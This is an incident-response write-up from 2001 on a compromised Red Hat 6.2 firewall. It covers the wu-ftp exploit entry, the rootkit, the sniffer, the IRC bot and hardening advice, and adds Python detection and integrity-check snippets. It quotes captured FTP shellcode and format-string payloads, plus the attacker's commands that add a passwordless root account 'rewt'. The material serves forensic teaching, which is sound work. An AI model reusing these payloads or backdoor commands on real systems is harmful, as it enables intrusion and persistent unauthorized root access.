Curt Wilson, Netw3 Consulting 02/02/2001

This is my first analysis of a Linux box that has been rooted. This is intended to be somewhat of a teaching document, and does not assume a large degree of technical skill. If anyone sees any errors in here or has any comments, I'd be happy to hear from you at netw3@netw3.com
The box in question is an unpatched Red Hat Linux 6.2 machine running as an ipchains firewall and IP masquerade server.
The main goal of the attacker(s) in compromising the system seems to have been setting up a BNC server that allows connections to IRC networks, along with an IRC bot. The attacker also used the compromised Linux system to search for other vulnerable systems running the Washington University FTP server (wu-ftp) through the use of two exploits (wu-scan and muje), as well as the attempted or actual exploitation of numerous remote systems through the statdx exploit. The statdx exploit attacks the remote procedure call application rpc.statd and opens up an interactive root shell on TCP port 39168. (For more info on statdx, see the paper by George Bakos at http://www.sans.org/y2k/practical/George_Bakos.html.)
The intruder erased the log directory /var/log, which damaged numerous symlinks. A more careful attacker would have left this directory intact but edited the specific log files to erase their tracks. It is clear from system analysis that this person is what's known as a "script kiddie" and does not represent an advanced attacker.
The intruder appears to have penetrated the system using an exploit that attacks wu-ftp. The default wu-ftp on Red Hat 6.2 (wu-2.6.0(1) in this case) is vulnerable; exploit code has been published on the Internet and has been in wide use amongst the cracker underground. Patches are available on the Red Hat website.
Buffer overflow attacks on wu-ftp take place through a specially crafted password sequence that includes the spawning of /bin/sh. The IP addresses below are most likely other compromised systems that the attackers are using to break into other sites, and one of them could be the site that was used to crack this box. Logs of attacks in progress:
211.72.123.250 => external_ip_of_linux_system [21]
LeLmNnNnUSER ftp
NBnPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

151.15.186.199 => external_ip_of_linux_system [21]
Xv+R6-6-
user ftp]-1pass 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11a-
3-a-aSITE EXEC %x %x %x %x +%x |%x

156.111.178.186 => external_ip_of_linux_system [21]
EEUSER ftp
QPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

syr-24-95-165-70.twcny.rr.com => external_ip_of_linux_system [21]
q-q-q-q-USER ftp
q-%PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

211.250.5.4 => external_ip_of_linux_system [21]
FFUSER ftp
pPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

63.105.115.4 => external_ip_of_linux_system [21]
L'L'0$L)^1L)^1USER ftp
L)k1PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
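As an added illustration (not part of the original write-up), the following Python flags the two tell-tale signs visible in the captures above: a PASS argument full of non-printable, shellcode-like bytes after an anonymous USER, and a SITE EXEC carrying printf conversions. The session transcripts are constructed stand-ins modelled on the sniffer output; the source addresses are the ones logged above.

```python
import re
from typing import Dict, List

# Constructed FTP control-channel captures modelled on the sniffer output in the
# write-up. The PASS payloads are made-up stand-ins for shellcode, not real code.
SAMPLE_SESSIONS: Dict[str, List[str]] = {
    "211.72.123.250": [
        "USER ftp",
        "PASS \x90\x90\x90\x31\xc0\x50\x68bin\x00sh\x31..\x11",
    ],
    "151.15.186.199": [
        "USER ftp",
        "PASS \x90\x90\x90\x31\xc0\x50\x68bin\x00sh",
        "SITE EXEC %x %x %x %x +%x |%x",
    ],
}

# printf-style conversions that a vulnerable wu-ftpd passes straight to the formatter
FORMAT_SPEC = re.compile(r"%[-+ 0#]*\d*(?:\.\d+)?[xXnpsdu]")
SHELL_FRAGMENT = re.compile(r"bin.{0,3}sh")  # "/bin/sh" with NUL or junk in between

def suspicious_commands(commands: List[str]) -> List[str]:
    """Explain why one FTP session looks like a wu-ftpd exploit, or return []."""
    reasons: List[str] = []
    anonymous = False
    for line in commands:
        verb, _, arg = line.partition(" ")
        verb = verb.upper()  # the captures show both "USER" and "user"
        if verb == "USER" and arg.lower() in ("ftp", "anonymous"):
            anonymous = True
        elif verb == "PASS":
            binary = any(not 32 <= ord(ch) < 127 for ch in arg)
            if binary or SHELL_FRAGMENT.search(arg):
                reasons.append("PASS carries binary or shellcode-like data")
        elif verb == "SITE" and arg.upper().startswith("EXEC"):
            if FORMAT_SPEC.search(arg):
                reasons.append("SITE EXEC with printf format specifiers")
    if reasons and anonymous:
        reasons.append("delivered over an anonymous login")
    return reasons

def scan(sessions: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Map each source address to its findings, dropping clean sessions."""
    hits: Dict[str, List[str]] = {}
    for src, cmds in sessions.items():
        reasons = suspicious_commands(cmds)
        if reasons:
            hits[src] = reasons
    return hits
```

A legitimate anonymous login (USER ftp, PASS user@host) produces no findings, so the check is safe to run over a whole sniffer or IDS feed.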
The wu-ftp exploit probably allowed the attacker to bind /bin/sh to a TCP port. The attacker then telnets to the port and has interactive root access. Another method is that the exploit allows the execution of arbitrary code, such as appending a username to the /etc/passwd and /etc/shadow files that is then used through the telnet port. Without detailed logs, it's hard to know exactly what the attacker did, since they cleaned up some other commonly exploited services when they first logged in to the system. It's possible that the attacker gained some other means of initial access, but the evidence suggests that these FTP exploits were the means. A Red Hat announcement about this problem can be found at http://www.redhat.com/support/errata/RHSA-2000-039.html
At some point, this attacker (or other attackers) placed a file at /bin/psr which adds a user named "rewt" with root level access and a user named "mujixi" to the /etc/passwd and /etc/shadow files:

echo "rewt:x:0:0:root user,,,:/root:/bin/bash" >>/etc/passwd
echo "mujixi:x:666:666:ala care da muje,,,:/tmp:/bin/bash" >>/etc/passwd
echo "rewt::::::::" >>/etc/shadow
echo "mujixi::::::::" >>/etc/shadow
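An added check, not from the original write-up: given the contents of /etc/passwd and /etc/shadow (constructed here in Red Hat 6.2 style with the two entries /bin/psr appends), it flags exactly the traits of those backdoor accounts: a second uid 0, an empty shadow password field, and a login shell homed in /tmp.

```python
from typing import Dict, List

# Constructed /etc/passwd and /etc/shadow contents in Red Hat 6.2 style, with
# the two entries /bin/psr appended. Hashes are placeholders, not real crypt output.
PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
ftp:x:14:50:FTP User:/home/ftp:
curt:x:500:500:Curt Wilson:/home/curt:/bin/bash
rewt:x:0:0:root user,,,:/root:/bin/bash
mujixi:x:666:666:ala care da muje,,,:/tmp:/bin/bash
"""
SHADOW = """root:$1$PLACEHOLDER$notarealhash:11322:0:99999:7:::
bin:*:11322:0:99999:7:::
ftp:*:11322:0:99999:7:::
curt:$1$PLACEHOLDER$notarealhash:11322:0:99999:7:::
rewt::::::::
mujixi::::::::
"""
WORLD_WRITABLE_HOMES = ("/tmp", "/var/tmp", "/dev")

def audit_accounts(passwd: str, shadow: str) -> Dict[str, List[str]]:
    """Return {username: [findings]} for accounts that look like backdoors."""
    findings: Dict[str, List[str]] = {}

    def note(user: str, msg: str) -> None:
        findings.setdefault(user, []).append(msg)

    users = set()
    uid_owner: Dict[str, str] = {}  # first account seen with each uid
    for line in filter(None, passwd.splitlines()):
        fields = line.split(":")
        if len(fields) != 7:
            note(fields[0], "malformed passwd entry")
            continue
        user, uid, home, shell = fields[0], fields[2], fields[5], fields[6]
        users.add(user)
        if uid == "0" and user != "root":
            note(user, "uid 0 but not root")
        if uid in uid_owner:
            note(user, "shares uid %s with %s" % (uid, uid_owner[uid]))
        uid_owner.setdefault(uid, user)
        if home in WORLD_WRITABLE_HOMES and shell.endswith("sh"):
            note(user, "login shell with home directory %s" % home)
    for line in filter(None, shadow.splitlines()):
        user, pw = (line.split(":") + [""])[:2]
        if pw == "":
            note(user, "empty password field: login needs no password")
        elif user not in users:
            note(user, "shadow entry without passwd entry")
    return findings
```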
After obtaining root access, the attacker modified multiple system files and scripts to cover their tracks. /etc/rc.d/rc.sysinit has been modified to run the following:

/usr/sbin/sshd2
/usr/sbin/gpm.root
/usr/sbin/gpm.root

/usr/sbin/gpm.root appears to be controlled by a config file, /etc/gpm-root.conf, and contains the following commands:

cd /usr/X11R6/include/X11/…

This directory is invisible to the standard ls command, but will show up with an ls -a to display all files. This is a common attacker trick. Most of the attacker's tools were placed in this directory.

./linsniffer > tcp.log &

linsniffer captures logins and passwords in an Ethernet environment. A switched network makes this attack more difficult.

/usr/sbin/sshd2 -p 1983

The attacker runs an SSH server on port 1983.
After exploiting the system for root access, the attacker appears to have added a username "muje1" to the /etc/passwd and/or /etc/shadow files with a group ID of 501. The attacker also edited the /etc/ftpusers file, perhaps allowing more users to log in through FTP than the original setting. Other suspicious user IDs include "muje", and group IDs include 1018 and 1004.

Next, the attacker kills all instances of the lpd process. This is probably so others won't exploit "his" system through an lpd buffer overflow (never mind that lpd was not an open port from the outside; the attacker wanted to secure his own access). The attacker also removed the portmapper startup file /etc/rc.d/init.d/portmap, which stopped the portmapper from listening on TCP port 111 (never mind that the portmapper was not an open port from the outside). The attacker then cleans up by running "updatedb" and removing a package named srk.tar.gz (which might be a rootkit), and removing the home directories of users muje and muje1.
The attacker appears to have replaced various system binaries such as netstat, ps, ifconfig, and top to cover their tracks. The replaced version of ps does not show activity such as the linsniffer, and the replaced version of ifconfig does not show the interface running in promiscuous mode. The other replaced binaries are most likely tailored to hide the attacker's activities from administrators' eyes. These replacements may have been done with srk.tar.gz. I was unable to find a published tool named "srk", but the "rk" suggests a rootkit. Please see http://packetstorm.securify.com/UNIX/penetration/rootkits/ for a large selection of rootkits.

The group ID 1018 appears to have run the rootkit. The system binaries that were replaced by this activity are as follows:
-rwxr-xr-x 1 1018 users 19840 Nov 25 1998 /sbin/ifconfig
-rwxr-xr-x 1 1018 users 33280 Dec 27 1998 /bin/ps
-rwxr-xr-x 1 1018 users 35300 Jan  2 1999 /bin/netstat
-rwxr-xr-x 1 1018 users 53588 Jan 12 1999 /usr/bin/top
-rwxr-xr-x 1 1018 users 13621 Dec 19 10:14 /bin/vobiscu (unfamiliar)
The group ID 1004 created the following files of interest:

[root@fortran /dev]# ls -al /dev/caca
-rw-rw-r-- 1 root 501 117 Jan 13 21:01 /dev/caca
[root@fortran /dev]# strings /dev/caca
1 193.226.125
1 193.230.192
1 194.102.218
1 193.231.249
3 31221
3 31337
3 89898
3 44113
3 31223
3 22546
3 666
4 6666
31337 is commonly used in the computer underground. Many Trojan horse applications listen on port 31337. It is a variation of the word "elite". 666 is used by attackers, and port 6666 may refer to an IRC or BNC server.
-rw-rw-r-- 1 root 501 97 Jan 13 21:01 /dev/dsx
[root@fortran /netw3]# strings /dev/dsx | more
3 psybnc
3 wu-scan
3 muje
3 statdx
3 sl2
3 sshd2
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc

/dev/dsx appears to be a listing of what the attacker has installed.

-rw-rw-r-- 1 root 501 12288 Jan 13 21:01 /etc/psdevtab

[root@fortran .ssh]# ls -al /root/.ssh
total 16
drwxr-xr-x 2 root root 4096 Jan 24 00:17 .
drwxr-x--- 8 root root 4096 Feb  2 18:54 ..
-rw------- 1 root root 663 Jan 28 20:41 known_hosts
-rw------- 1 root 501 512 Jan 28 20:41 random_seed

-rw-r--r-- 1 1004 users 307 Aug 31 1998 /usr/man/man6/ssh_config
-rw------- 1 root 501 552 Jan 13 21:01 /usr/man/man6/ssh_host_key
-rw-rw-r-- 1 root 501 356 Jan 13 21:01 /usr/man/man6/ssh_host_key.pub
-rw------- 1 root 501 512 Feb  3 04:55 /usr/man/man6/ssh_random_seed
-rw-r--r-- 1 1004 users 697 Dec 27 1998 /usr/man/man6/sshd_config

/usr/man/man6 is also used by the attacker(s) to store SSH key and configuration files.
The following ports are open and listening on the local (192.168) interface of the system:
21 ftp # point of entry
22 ssh # activated by attacker
23 telnet
25 smtp
79 finger
98 linuxconf
113 auth
513 rlogin
514 rsh
515 lp
1983 ssh # activated by attacker
The primary user that ran the BNC server appears to go by the name of "bulangia" or "buLaneL" or "bulanel", and a secondary user goes by the name of "NINA16". There is evidence of multiple connections to Bulgarian and Italian IRC networks and remote systems. Some of the hosts that used the BNC server include 5dial86.xnet.ro and 11dial217.xnet.ro. Various IRC servers were visited by these users, and if further action were warranted, investigations could take place by connecting to the same IRC networks and attempting to track these people down.
The attacker(s) also installed what appears to be an IRC bot going by the name of "eddy" or "eddybot". The software package used to implement this bot was called emech-2.8, and the config file for e-mech reveals details such as an ircname of "H-a-c-k T-h-e F-u-c-k-i-n-g P-l-a-n-e-t !" and channels such as "#Linux_mafia". The linkpass and entityname are present in the config and users file, which could allow counterintelligence to be performed if desired.
Recommendations:

Apply patches to Red Hat systems running ipchains firewalls. Red Hat 6.2 has nearly 50 security patches. See http://www.redhat.com/support/errata/rh62-errata-security.html.
Several accounts and passwords were obtained through the use of the linsniffer application. A switched environment can help reduce the risk of sniffing attacks.
Lock down systems to provide "defense in depth". Do not simply rely upon ipchains to block hostile traffic. Deny all traffic except what is specifically allowed. Comment out services in /etc/services that do not need to be run (finger, etc.) as well as in /etc/rc.d. If the FTP service will be used, make sure that /etc/ftpusers only allows specific usernames. If an attacker pierces the firewall mechanism, limit what is available by turning off everything that is not needed, leaving only those services that are truly necessary. Portsentry, which is running on the system, is a nice addition, but obviously did not help in this instance.
Since the wu-ftp vulnerabilities are widely known, an attacker would only have to find TCP port 21 open with a banner that identified itself as a vulnerable version of wu-ftp. The use of TCP wrappers and ipchains to restrict access to ftpd would be helpful. Modify the banners of listening services to reflect false information to confuse attackers and automated exploit/scanning applications.
Systems management should never be performed over an unencrypted connection such as telnet. Install SSH on the server and on your client systems and use it. This encrypts connections and makes it much harder for an attacker to obtain your login credentials.
An intrusion detection system such as snort (www.snort.org) is inexpensive, easy to configure, and in wide use. Snort can monitor a network and alert a network manager (with the proper configuration) via pager or email that an attack is taking place. Tripwire is a file integrity monitor that can be used to take a snapshot of certain key system files (such as ps, netstat, ifconfig, and many more). When these key system files are changed, an alert can be generated to notify that something suspicious is taking place. There are freeware/GPL options for SSH (OpenSSH) and a freeware Tripwire clone available on the Internet (see www.whitehats.com for a large collection of open source security tools).
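An added example, not the author's or Tripwire's code: a minimal file-integrity baseline in Python for the binaries this report found replaced, illustrating the Tripwire recommendation above. It records content hash, size, owner, mode and mtime so that a swapped binary is caught even when its timestamp is backdated, as the listings above show; demo() stands in for /bin with a scratch directory.

```python
import hashlib
import json
import os
import tempfile
from typing import Dict
# Binaries the rootkit replaced on this box; a real deployment would watch far more.
WATCHED = ["/bin/ps", "/bin/netstat", "/sbin/ifconfig", "/usr/bin/top"]

def fingerprint(path: str) -> Dict[str, object]:
    """Capture what a trojaned binary changes: content hash, size, owner, mode, mtime."""
    st = os.lstat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"sha256": digest.hexdigest(), "size": st.st_size, "uid": st.st_uid,
            "gid": st.st_gid, "mode": st.st_mode & 0o7777, "mtime": int(st.st_mtime)}

def take_baseline(out_file: str, paths=WATCHED) -> Dict[str, Dict[str, object]]:
    """Snapshot the watched files; keep out_file on read-only or off-host storage."""
    base = {p: fingerprint(p) for p in paths if os.path.isfile(p)}
    with open(out_file, "w") as fh:
        json.dump(base, fh, indent=1)
    return base

def compare(baseline_file: str) -> Dict[str, str]:
    """Return {path: what differs} for every baselined file that changed or vanished."""
    with open(baseline_file) as fh:
        base = json.load(fh)
    changes: Dict[str, str] = {}
    for path, old in base.items():
        if not os.path.isfile(path):
            changes[path] = "missing"
            continue
        new = fingerprint(path)
        diff = sorted(k for k in old if old[k] != new[k])
        if diff:  # a backdated mtime (as on this box) still trips sha256 and size
            changes[path] = "changed: " + ", ".join(diff)
    return changes

def demo() -> Dict[str, str]:
    """Exercise the checker in a scratch directory standing in for /bin."""
    workdir = tempfile.mkdtemp()
    fake_ps = os.path.join(workdir, "ps")
    open(fake_ps, "wb").write(b"pretend this is the stock ps binary\n")
    baseline = os.path.join(workdir, "baseline.json")
    take_baseline(baseline, [fake_ps, os.path.join(workdir, "absent")])
    # simulate the rootkit swapping in its own ps
    open(fake_ps, "wb").write(b"trojaned ps that hides linsniffer\n")
    return compare(baseline)
```

A baseline stored on the monitored host is only as trustworthy as the host: with root, the intruder can rewrite it, so keep it on read-only media or another machine.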
Curt Wilson - Netw3 Consulting
netw3@netw3.com